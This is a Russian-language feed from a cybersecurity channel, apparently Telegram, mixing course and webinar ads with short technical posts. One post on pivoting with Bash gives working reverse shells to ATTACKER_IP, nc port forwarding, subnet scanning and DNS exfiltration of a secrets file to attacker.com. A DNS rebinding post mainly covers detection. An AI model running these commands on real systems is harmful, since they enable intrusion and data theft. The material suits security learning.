ZeroDay | Кибербезопасность

Кибербезопасность как специализация в магистратуре — теперь и с треком по ИИ-безопасности ⏺️ НИЯУ МИФИ в партнерстве с Яндекс Практикумом год назад запустили онлайн магистратуру с треками: AppSec, DevSecOps и сетевая безопасность. В этом году добавился еще один — безопасность ИИ. На эту область стоит обратить пристальное внимание, ведь число вакансий в ней за год выросло в 4 раза. ⏺️ Подходит для тех, кто задумывается о смене специальности, хочет продолжить свое образование в сфере кибербезопаности, прокачать опыт через CTF-соревнования в команде университета и просто стать востребованным ИБ-шником. ⏺️ 15 апреля в 19:00 мск онлайн пройдет день открытых дверей с участием экспертов программы Фёдора Герасимова (Team Lead DevSecOps в Т1) и Сергея Нестерука (ML Security в Yandex Cloud), а также академического руководителя программы и директора Института интеллектуальных кибернетических систем НИЯУ МИФИ Константина Когоса. В рамках встречи: — расскажут как выбрать трек; — разберут дисциплины и познакомят с преподавателями; — ответят на вопросы про вступительные и даты приемной кампании Зарегистрироваться ZeroDay | #Образование Реклама. О рекламодателе.

Data Gravity и отравление выборки: как незаметно ломаются ML-системы Пока все спорят про архитектуры и модели, реальные проблемы обычно лежат ниже - в данных. Они накапливаются, расползаются по системам, обрастают костылями и в какой-то момент становятся настолько «тяжёлыми», что их уже нельзя ни нормально собрать, ни проверить ⏺В статье говорят о том, как Data Gravity превращает инфраструктуру в зависимость от самих данных: десятки источников, копии без версий, ETL, который живёт своей жизнью. На этом фоне отравление выборки становится почти незаметным: можно подмешать шум, сдвинуть разметку или встроить триггер - и модель спокойно это выучит. ZeroDay | Белый Хакер | #Статья

⚠️Утечка данных редко происходит один раз. Чаще это управляемый процесс, скрытый за обычным сетевым трафиком. И если смотреть только на отдельные события, вы его просто не увидите. На открытом уроке разберём, как устроено внешнее управление атаками и почему именно инфраструктура управления определяет масштаб инцидента. Вы поймёте, что такое инфраструктура управления (Command & Control) и как он маскируется под привычные протоколы — защищённые соединения, системы доменных имён и облачные сервисы (HTTPS, DNS). Открытый урок пройдет 8 апреля в 20:00 МСК в преддверии старта курса «Компьютерная криминалистика». Вы сможете оценить уровень и практическую ценность обучения. 📎Зарегистрируйтесь и начните видеть больше, чем показывает мониторинг: https://otus.pw/QJ15/ Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576

Bash для пивотинга в сети 👋 Приветствую в мире цифровой безопасности! Попали на машину внутри сети. Дальше нужно двигаться, но инструментов нет. Разберём, что можно сделать чистым Bash. ⏺Обратный shell без nc и socat:

    
        bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1{}
    

Если наружу есть выход, этого достаточно, чтобы получить интерактивный доступ. Часто работает там, где всё остальное выпилено. ⏺Проксируем трафик через FIFO, если нет нормального туннеля:

    
        mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_IP 4444 > /tmp/f{}
    

Это уже ближе к «ручному сокету». Можно собрать канал там, где обычные методы ломаются. ⏺Мини-портфорвардинг через Bash:

    
        while true; do nc -l -p 8080 -c 'nc internal_host 80'; done{}
    

Если есть nc, можно быстро прокинуть доступ к внутреннему сервису через текущую машину. Примитивно, но работает. ⏺Чтение внутренних сервисов напрямую через HTTP руками:

    
        exec 3<>/dev/tcp/127.0.0.1/8080
echo -e "GET / HTTP/1.1\r\nHost: localhost\r\n\r\n" >&3
cat <&3{}
    

Полезно, когда нет curl, но нужно быстро понять, что вообще отвечает на порту. ⏺Динамическое сканирование подсетей через route:

    
        for net in $(ip route | awk '{print $1}'); do
  for ip in $(prips $net); do
    (echo >/dev/tcp/$ip/22) &>/dev/null && echo "$ip:22"
  done
done{}
    

Не просто /24, а всё, что реально доступно с этой машины. Иногда находятся неожиданные сегменты. ⏺DNS как канал наружу:

    
        for i in $(cat secret.txt | xxd -p); do
  dig $i.attacker.com
done{}
    

ZeroDay | Бункер Хакера | #bash

Автоматизация выводит фишинг на новый уровень: генерация поддельных сайтов нейросетями делает атаки массовыми и дешевыми. ⏺Истинная цель защиты — сломать эту экономику, чтобы создание вредоносных ресурсов перестало окупаться. ⏺Техническая база для этого уже существует: алгоритмы платформы управления киберугрозами X-Threat Intelligence выявляют мошеннические домены еще на этапе регистрации, задолго до загрузки вредоносного кода. Однако корпоративному сектору не хватает полномочий для оперативного разделегирования таких адресов. ⏺Выходом должна стать прямая интеграция корпоративных ИБ-систем и государственных механизмов. Как подчеркивает в статье вице-президент Сбера по кибербезопасности Сергей Лебедь в преддверии форума «ГосСОПКА 2026», если объединить алгоритмы раннего обнаружения угроз с административным ресурсом регуляторов, появится возможность проактивно уничтожать инфраструктуру атакующих в национальном масштабе. ZeroDay | Белый Хакер | #Статья

Первая в стране специализация по реверс-инжинирингу - этичному хакингу программных устройств   👋 Приветствую в мире цифровой безопасности! МФТИ и Positive Technologies запускают совместную программу, рассказали в Ведомостях. Студентов с первого курса будут учить «препарировать» сложные устройства - беспилотные авто, умные сети, роботизированное медицинское оборудование, чтобы выявлять в них проблемы безопасности и затем  устранять их.  ⏺ Открывается программа «Разработка систем кибербезопасности и реинжиниринг киберфизических систем». ⏺ Два профиля: разработка ПО для ИБ и исследование защищенности объектов  ⏺ С первого семестра –  практика в лаборатории с инжинерным оборудованием для исследований ⏺ Преподавателями и наставниками станут действующие эксперты R&D-центра Positive Labs.  ZeroDay | Белый Хакер | #Образование #РеверсИнжиниринг #новость

Crypto engine для флешек: как не потерять данные и не слить ключи 👋 Приветствую в мире цифровой безопасности! Расскажу, как написать свой crypto engine под флешку, чтобы работало безопасное хранение ключей, потоковое шифрование и другие фишки. ⏺Задача, вроде, простая на словах: зашифровать файлы на флешке так, чтобы это работало везде и не ломалось при выдёргивании. Типичные решения вроде контейнеров неудобны, а «зашифровал файл и удалил оригинал» легко убивает данные при любом сбое. Поэтому вся сложность не в алгоритмах, а в инженерии вокруг. ⏺Первая проблема всплывает сразу, и конечно - это память: В Python ключи и пароли живут в bytes, а это неизменяемый объект. GC может копировать его по памяти, и в итоге ключ остаётся в RAM даже после «удаления». Это тихая утечка. Решается через управляемый буфер:

    
        class SecureBytes:
    def __init__(self, data):
        self._buffer = bytearray(data)

    def wipe(self):
        self._buffer[:] = secrets.token_bytes(len(self._buffer))
        self._buffer[:] = b'\x00' * len(self._buffer){}
    

Смысл в том, что bytearray можно перезаписать по тому же адресу. Сначала случайные байты, потом нули. Ключ не остаётся висеть в памяти после работы. ⏺Дальше упираемся в размер файлов: Флешка на 10 ГБ и машина с 4 ГБ RAM не прощают попыток читать всё сразу. Значит только потоковая обработка: читаем, шифруем, пишем блоками.

    
        with open(file, "rb") as f:
    while chunk := f.read(8192):
        encrypt(chunk){}
    

Но тут появляется более тонкий момент - nonce. В AES-GCM или ChaCha20 нельзя использовать один и тот же nonce дважды с одним ключом. Если просто шифровать куски подряд, это ломает безопасность.

    
        def derive_nonce(base, i):
    return base[:8] + i.to_bytes(4, "big"){}
    

Каждый блок получает свой nonce. Файл может быть хоть 100 ГБ, схема остаётся корректной. ⏺Самая неприятная часть - сбои. Если выдернуть флешку в процессе, стандартный подход ломает всё: оригинал удалён, новый файл не дописан. ⏺Решение выглядит скучно, но именно оно спасает данные: сначала пишем во временный файл, потом проверяем, и только после этого заменяем оригинал

    
        file.txt -> file.txt.tmp -> verify -> rename{}
    

Параллельно ведётся lock-файл, чтобы понимать, что операция не завершена:

    
        { "status": "in_progress", "files": [...] }{}
    

Если процесс упал, при следующем запуске можно откатиться и восстановить исходные данные. ⏺Проверка целостности тоже не формальность: Перед удалением оригинала файл расшифровывается обратно и сверяется хеш:

    
        sha256sum original
sha256sum decrypted_tmp{}
    

Не совпало - значит оригинал остаётся. ⏺По алгоритмам всё ожидаемо: AES-256-GCM как базовый вариант, ChaCha20-Poly1305 если нет аппаратного ускорения, XChaCha20 когда важен большой nonce и длинные потоки. Это не «своя крипта», а нормальные примитивы, вся логика вокруг них. ⏺Ограничения тоже честные: Имена файлов не скрыты, структура директорий видна. Если на машине кейлоггер, пароль уже не спасти. Зато при потере флешки данные остаются закрыты. ➡️Ссылка на - статью ZeroDay | Бункер Хакера | #криптография

Стратегия ИБ 2026: почему утечек всё больше, а взломов баз — меньше? Ландшафт угроз изменился: злоумышленники перешли к атакам через цепочки поставок (Supply Chain), что требует от ИБ-команд мгновенной реакции. 7 апреля мы обсудим, как адаптировать стратегию защиты под новые реалии и почему скорость реакции сегодня важнее всего. В программе вебинара: — Анализ TTPs 2025: почему точечные операции стали эффективнее массовых взломов. — Оценка ROI стратегий: как руководителю обосновать выбор инструментов защиты в условиях новых векторов угроз. — Zero Trust на практике: как минимизировать риски «человеческого фактора» и автоматизировать безопасность. Спикеры — эксперты из Контур.Эгиды и F6 — помогут скорректировать ваш план защиты на 2026 год. Участие бесплатное, регистрируйся! #реклама О рекламодателе

DNS rebinding: браузер как шлюз во внутреннюю сеть 👋 Приветствую в мире цифровой безопасности! ⏺DNS rebinding - это когда браузер сам начинает ходить во внутреннюю сеть, думая, что всё ещё работает с обычным сайтом. Домен сначала резолвится во внешний IP, проходит все проверки, а через пару секунд уже указывает на 192.168.x.x или 10.x.x.x. Для браузера ничего не поменялось, а для инфраструктуры — уже совсем другая история. ⏺В трафике это палится довольно рано: короткий TTL и быстрая смена IP у одного домена.

    
        dns && dns.resp.ttl < 5{}
    

⏺Дальше смотришь, куда этот домен реально начинает ходить:

    
        ip.addr == <подозрительный_домен>{}
    

Если сначала внешний IP, а потом внезапно внутренний диапазон - это уже не совпадение, а почти готовый индикатор. ⏺На уровне HTTP все ещё интереснее: запросы идут во внутреннюю сеть, но с Host атакующего домена.

    
        http.host contains "attacker-domain.com"{}
    

Получается, внутренний сервис принимает запрос как «свой», хотя он пришёл через браузер пользователя. ⏺Дальше всё зависит от того, что внутри открыто. Часто это админки роутеров, Docker API, Kubernetes, какие-то dev-панели без нормальной авторизации. Если сервис не проверяет Origin и просто отвечает — он уже доступен. ⏺Проверка руками занимает минуту:

    
        curl -H "Host: attacker-domain.com" http://192.168.0.1{}
    

Если приходит ответ, значит через rebinding туда тоже можно дотянуться. ⏺С DNS тоже всё видно сразу:

    
        dig attacker-domain.com +short
sleep 2
dig attacker-domain.com +short{}
    

IP «прыгает» - значит домен может использоваться для такой атаки. ⏺Если разбираешь pcap, удобно просто собрать цепочку:

    
        tshark -r dump.pcap -Y "dns || http"{}
    

И посмотреть момент, где после DNS-ответа начинается HTTP во внутренний адрес. ZeroDay | Бункер Хакера | #DNS